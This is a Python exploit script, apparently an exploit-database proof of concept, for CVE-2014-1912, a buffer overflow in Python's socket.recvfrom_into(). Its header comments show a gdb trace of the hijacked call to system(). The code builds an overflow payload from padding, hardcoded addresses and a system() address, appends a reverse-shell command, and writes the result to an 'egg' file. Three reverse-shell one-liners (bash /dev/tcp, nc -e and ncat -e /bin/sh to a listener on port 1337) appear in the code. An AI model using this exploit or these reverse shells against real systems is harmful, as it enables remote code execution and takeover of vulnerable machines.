#!/usr/bin/env python

'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912



socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder

With NX evasion!


(gdb) x/i $eip
=> 0x817bb28:	mov    eax,DWORD PTR [ebx+0x4]       <--- ebx full control => eax full conrol
   0x817bb2b:	test   BYTE PTR [eax+0x55],0x40
   0x817bb2f:	jne    0x817bb38 -->
   ...
   0x817bb38:	mov    eax,DWORD PTR [eax+0xa4]      <--- eax full control again
   0x817bb3e:	test   eax,eax
   0x817bb40:	jne    0x817bb58 -->
   ...
   0x817bb58:	mov    DWORD PTR [esp],ebx  <---- ebx points to the beginning of the buffer   [trash]||shell cmd[null byte]
   0x817bb5b:	call   eax <--------------------- indirect fucktion call ;) will be redirected to system()

'''

import struct

def off(o):
	return struct.pack('L',o)


'''
rop = {
	'pop eax': off(0x80795ac),
	'call eax': off(0x817bb5b),
	'xor eax': off(0x8061379),
	'mov [eax], edx': off(0x8078cf6),
	'xor edx, edx': off(0x80a60d1),
}
'''

plt = {
	'system': off(0x805b7e0),
}




#addr2null = off(0x11111111)


ebx = 0xb7ae7908  # points to the begining of the buff 
eax = ebx
eax2 = ebx+20
padd2 = 'X'*(144)
padd1 = 'Y'*(8)  

#system_command = 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'
#system_command = 'nc -e /bin/sh 127.0.0.1 1337'
system_command = 'ncat -e /bin/sh 127.0.0.1 1337'

'''           
        +------------+------------------+                      +--------------------+
        |            |                  |                      |                    |
        V            |                  |                      |                    V         
'''
buff = 'aaaa' + off(eax) + padd1 + off(ebx) + padd2 +  plt['system'] + '||'+system_command+'\x00' # thanks python strings ;)


print 'buff sz: %s' % len(buff)
open('egg','w').write(buff)
print 'egg file generated!!!'